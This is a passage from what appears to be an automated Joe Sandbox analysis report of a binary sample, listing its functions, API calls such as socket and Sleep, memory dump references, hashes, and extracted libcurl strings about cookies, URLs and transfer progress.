                                                • Opcode Fuzzy Hash: 06f64945f9f36f3f6bad62a21e67879dd23eafc386196a0f5d62a7e3f2128f64
                                                • Instruction Fuzzy Hash: 7A01A7B1B117109FD6149F15DC45B5BB7A5EF84720F0A895AE9981B361C331AC108BD1
                                                Function 0048AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(?,0048B280,00000000,-00000001,00000000,0048B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0048AF66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: socket
                                                • String ID:
                                                • API String ID: 98920635-0
                                                • Opcode ID: e44465ea4b3de4017a0cacb78bf03460c4db9fcf2f14317c632d173f63fbfcfc
                                                • Instruction ID: 0f0811b565848e28dfa569942c0490b06d5965c655752cdd7e8b32af2534ad67
                                                • Opcode Fuzzy Hash: e44465ea4b3de4017a0cacb78bf03460c4db9fcf2f14317c632d173f63fbfcfc
                                                • Instruction Fuzzy Hash: A4E0EDB2A052216BD6649A58E8449ABF3A9EFC8B20F054A4ABD5463304C370AC508BE2
                                                Function 0048B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • closesocket.WS2_32(?,00489422,?,?,?,?,?,?,?,?,?,?,?,w3G,00854C60,00000000), ref: 0048B04C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: closesocket
                                                • String ID:
                                                • API String ID: 2781271927-0
                                                • Opcode ID: 64e85f2fb829d54aaa4d5fe451d0bf2794c7a88c045750d25409d44f2def9048
                                                • Instruction ID: 646f1b9b187094222cd59705072c54cfe9929bcedd5f4ea640cd8cdfa7b109db
                                                • Opcode Fuzzy Hash: 64e85f2fb829d54aaa4d5fe451d0bf2794c7a88c045750d25409d44f2def9048
                                                • Instruction Fuzzy Hash: 0ED0C2307002005BCA20AA14C884A4F732BBFC2714F29CF68E42C8A251C73FCC438781
                                                Function 004267E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                • ioctlsocket.WS2_32(?,8004667E,?,?,003FAF56,?,00000001), ref: 004267FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: ioctlsocket
                                                • String ID:
                                                • API String ID: 3577187118-0
                                                • Opcode ID: fefd356ffe4747c5267929195b5b7d4bcfd3b920eed4ae6648f557be71e78ab0
                                                • Instruction ID: b7b02b9c8c308994bb11e45670cdb1ee1f24bb19364215e43a8300b6ed987101
                                                • Opcode Fuzzy Hash: fefd356ffe4747c5267929195b5b7d4bcfd3b920eed4ae6648f557be71e78ab0
                                                • Instruction Fuzzy Hash: 9DC012F1109201EFC60C4724D855A6EB6D9DB85255F01592CB04692180EA349490CA16
                                                Function 003C31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: f83720b8ec4b6fa924622ac6e3527d2770ac4e52b183a88983c52200aeaf210d
                                                • Instruction ID: dcbe91ce231222fbd5800fa87f0ed2b3d19bec8ab4c2a5a438cb0257b349aa42
                                                • Opcode Fuzzy Hash: f83720b8ec4b6fa924622ac6e3527d2770ac4e52b183a88983c52200aeaf210d
                                                • Instruction Fuzzy Hash: 9E3193B49093189BCB10EFB8C58969EBBF0FF44304F01896DE898E7241EB749A44CF52
                                                Function 0074B180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 8f9ae45a0fc8cc6517cb2e4982f3407f65c0b0e20c520aa866686a7579a20a2d
                                                • Instruction ID: 50a0496ab36bfcbe501fa23efdb831f18fbdb28e5f9697c76ceb3c4cc774f3ee
                                                • Opcode Fuzzy Hash: 8f9ae45a0fc8cc6517cb2e4982f3407f65c0b0e20c520aa866686a7579a20a2d
                                                • Instruction Fuzzy Hash: 28C04CE4C1574446D700BA38C58611D79E47745204FC11A68998496195F768D3188657

                                                Non-executed Functions

                                                Function 00401BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                • API String ID: 0-1371176463
                                                • Opcode ID: 79f009825a02ad90cbbd2a4f8446ae036c2628049c5cfcbbefdc7400faf47328
                                                • Instruction ID: 0aaf7fd624463afebd6ff6d8b9364de66c546a025f95a3dc115f92323d5670b4
                                                • Opcode Fuzzy Hash: 79f009825a02ad90cbbd2a4f8446ae036c2628049c5cfcbbefdc7400faf47328
                                                • Instruction Fuzzy Hash: 64B21671A08301ABD7219A24DD4AF2777D5AF84304F08493EF889AB3D2E7B9EC01D756
                                                Function 003D4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                • API String ID: 0-122532811
                                                • Opcode ID: f0c0d4f921ad80e8d4f8a400cd8dca79d8c48f8c4e7c8bff12691b56ecbde067
                                                • Instruction ID: 148e9be6c4b3b66d042f0df3d5915255c67afb49f8a0d8a05858df03590c3ab6
                                                • Opcode Fuzzy Hash: f0c0d4f921ad80e8d4f8a400cd8dca79d8c48f8c4e7c8bff12691b56ecbde067
                                                • Instruction Fuzzy Hash: 5A42F872B08700AFD709DE24DC41B6BB6EAEBC4704F04892DF54D9B391E775AD148B92
                                                Function 003E4F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                • API String ID: 0-1914377741
                                                • Opcode ID: 54760e5c2d6536ff074cae753d5657ddefa306bd73c36a630f49dd8adf5a141b
                                                • Instruction ID: 4218dc080581b91c54b0160058be2c7b60553f74458a0d6b593d68af90bef67e
                                                • Opcode Fuzzy Hash: 54760e5c2d6536ff074cae753d5657ddefa306bd73c36a630f49dd8adf5a141b
                                                • Instruction Fuzzy Hash: 49722A30608BA19FE7238A2AC5467A7B7D29F91348F06872CED855B2D3E776DC84C741
                                                Function 003D5DB0 Relevance: 11.4, Strings: 9, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld$MD5-DES
                                                • API String ID: 0-225287189
                                                • Opcode ID: b085c9a7ef0b76ff83f8255f3be6ce6992310195d2de927dbd2b1b2c7c8d1fdc
                                                • Instruction ID: 7d8a461acb74fc8aff4e9988b3b946167d9f645fc2035eccaf69f5a9cbfa91b2
                                                • Opcode Fuzzy Hash: b085c9a7ef0b76ff83f8255f3be6ce6992310195d2de927dbd2b1b2c7c8d1fdc
                                                • Instruction Fuzzy Hash: F331D2B3B54A4526F7291109EC46F7E015FC3C4B14E6A823FF60A9B7C2D8F59D4042A9
                                                Function 00479880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                • API String ID: 0-2058201250
                                                • Opcode ID: e262f09d3cac866a43014245b5af56bf7f664e34aadad09fb5a52900745804c5
                                                • Instruction ID: 453220d9387f09a8aab4dbc3976b9812167ed86e833408db24a19c6d1f02f72e
                                                • Opcode Fuzzy Hash: e262f09d3cac866a43014245b5af56bf7f664e34aadad09fb5a52900745804c5
                                                • Instruction Fuzzy Hash: 8661FAE1A0830067E754B621AC42B7F7299AB95308F04C83EFD4E96382FA79ED048257
                                                Function 00580D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
